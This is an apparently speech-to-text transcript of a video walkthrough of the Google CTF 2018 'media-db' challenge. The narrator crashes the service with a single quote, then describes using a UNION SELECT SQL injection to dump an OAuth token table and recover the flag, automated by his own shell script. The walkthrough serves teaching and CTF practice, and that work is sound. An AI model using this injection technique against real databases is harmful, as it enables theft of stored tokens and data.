 Okay, so we're continuing. This is a part of a series looking at the 2018 capture the flag by Google this was brought to my attention by Two youtubers that I have really no affiliation with other than I subscribe to them live overflow and John Hammond and John Hammond I just recently started watching I've only watched a handful of videos But they're very good check him out. I did comments on one of his videos And he replied to the comment and let me know that he actually has learned a lot from my videos So that's great that he's a viewer of mine, and I'm a viewer of his and the world goes around. Okay Also, if you go to get lab comm Ford slash metalix 1000 Ford slash capital CTF You can download my project here, which has all the scripts that I'm showing in here that automate All the capture flags that I'm going through for this year today. We're looking at media dash DB media database And here's the synopsis synopsis synopsis. Yeah the description The gatekeeper software gives you access to a custom database to organize a music playlist It looks like it might also be connected to the smart fridge you to play custom door alarms Maybe we can grab the OR off token that gets us closer to cake Here we have a netcat commands connect to a server like we have in previous one And when I originally took this one, I was stumped for a little bit and then I realized there was also an attachment So we want to use this to connect to this server, but you also want to download the attachment So let me go ahead and I will copy that and first thing we'll first. We'll just look at the server I'll use netcat and I will paste in that server port Leet and here's our database. I can press one type in, you know Bob for the artist name song Bob song Enter and now if I hit two I can play an artist Bob and it says that you know Bob song by Bob We can also play a song. Let's see what happens if I just type Bob Yeah, it doesn't come up after the full name and then four will shuffle through your artists So let me just just for fun and another one Tom And well, I didn't ask me for a song title. Oh I added what did I add? I added an artist And we'll add a song whatever Tom. I'm just adding things in there to show you Tom song Great and if we say Add a song. Oops. Let's reconnect. We got this connected find out one. I can say Bob's song What's the song name? That was a title name. Anyway, we'll say top Bob song again hit enter now if I hit four boom we crashed the program Okay, so What caused that we'll look at this a little bit more. So let me go ahead and run my script in here media underscore DB dot sh and here I kind of walk you through we download the zip code the zip Archive extract it inside that is a Python code. So we have the Python code. I'd enter the continue So this is just my script kind of walking you through it looks like we're working with SQL We have two tables media and OAuth tokens We can see that OAuth tokens has the flag because we see this we'll look at the entire Python script here in a moment But we have these lines here showing that there's a table here a table here And then you can see we can insert insert into this table. We can see flag So it just kind of tells us that this table contains our flag. Go ahead and hit enter so We can see that We're adding things into the database Or at least what we're retrieving things from that is reading things with that base They used single quotes here And that's why when we said Bob's song because we use the apostrophe which is the same as a single quote it messes this up and So the next in my script does this as an example. Let's try injecting some random stuff We'll add a song and put this as the artist with the exclamation or single quote there And whatever we want for the song title then Tell it to play a random song with option four So we do that and boom it crashes the program because with that single quote It's thinking it's looking for a new sequel commands and this is not a sequel command So it crashes so looks across menu. That's good. So now let's try some sequel injection We'll combine the original request with a request for I spelled everything wrong in the OR off-table So originally the original thing I tried because I've only done a little bit of playing around with sequel injection in the past is I tried doing the single quote Select I said I said select all from oath toks and that didn't work What we need to use is the union command which combines the two commands. So from my understanding it's taking This command that I'm adding And combining it with the original one so that it doesn't so it continues through So we hit enter there you can see that it dumps this as an artist name and our song name and a title and They say there we go and then I trim it down. That is our token. So real quick. Let's look at the Python code here So we can see that we're running. It's a Python code. So this is basically this is the program that's running on the server and The fact that we were able to get a copy of this Allows us to see what's going on. So we're using SQL light or sequel light if you want to say it like that But I'm pretty sure it's supposed to be SQL light Three which is basically, you know, it's a database usually in a single file unlike My SQL which runs as a server normally this you'll have We're basically we're connecting to a folder in the server and there is a File on there. Anyway, it doesn't really matter for what we're talking about, you know Here's our main menu again. We can see that we're connecting it to You know, I guess memory a database. It's running in memory That's not really important again. These are the lines that were important right here again when you're doing these You know capture the flags I'm looking for keywords CTF and flags. So, you know, when I first opened this this caught my eye right here Also anything that says OAuth. So again, we can see that we have two tables and that we are If this one the OAuth tokens has the flag and again, and when we look through this We can see that when we're selecting means that we're reading something from the database So we're selecting artists song from the media table where artists equals something and that's where we're injecting Something new We're saying to actually we're using this random one down here but still still using single quotes and basically again, we're putting that single quote that Quotation or not that single quote apostrophe Basically, let me come down here. Let's see So basically when we're doing a request if we request something like this It's seeing this and saying oh, we're looking for a new command here It's we're finishing this and starting this Putting something random in there like that will crash it But if we put in our code with the union and selecting all from the OAuth It's going to run that and that's how we get our output and that's pretty much it again You can look through my shell script here, which automates and kind of walks you through the process again Here it starts off by removing the Python code if it already exists But I leave in there at the end so you can look through it We're gonna W get this zip file Unzip it remove the original zip file just to clean things up. Then I just you know Basically, I walk you through all this is just output So you know what's going on and then here's a command We're echoing all this which is basically saying select option one Insert this as the artist name insert this as a song name and then press forward to randomly play that and we're Saying all that to this server And that's obviously again crashes the Python script Next we come down here and we do the same thing But this time instead of putting in random gibberish We're say we're running our sequel injection command, which is this right here Saying the same thing to that server And then I do that same exact thing again, but here at the end I then grep for CTF tail one to grab the last Instance of that and then I use the cut command to get just our flag And that's how at the end of the script it gives you the proper flag you can copy and paste into the Google website And that is it. I hope you're enjoying the series. Please visit my website, which is films by Chris comm That's Chris of the K There's a link in the description that you can search through all my videos You can also go to the support section if you want to support me through patreon or PayPal There's also a patreon link in the description of this video if you can't do that Please like share subscribe comments all that good stuff. I do. Thank you for watching it as always I hope that you have a great day